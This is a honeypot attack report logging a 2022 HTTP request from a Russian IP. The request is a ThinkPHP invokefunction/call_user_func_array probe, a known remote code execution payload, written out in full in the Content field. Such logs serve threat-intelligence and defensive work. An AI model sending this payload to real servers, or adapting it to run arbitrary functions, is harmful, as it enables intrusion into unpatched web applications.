Attack Report for Detail

Header

Time

2022/09/14, 00:46:16 (GMT)

Transaction ID

GG08J5N6D1D6F55O

Service

http

Location

RU (Russia)

Attacker

152.89.196.211

Classification

Proxy connection

Harm Potential

Medium

Description

Access to the webserver using proxy for hiding.

Content

GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
Host: ***.***.***.***:80
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Encoding: gzip
Connection: close

All details are coming from honeypot central database.

Please share your wishes, opinions and suggestions with us:

If you like, you can support
with your donations to us..

Donate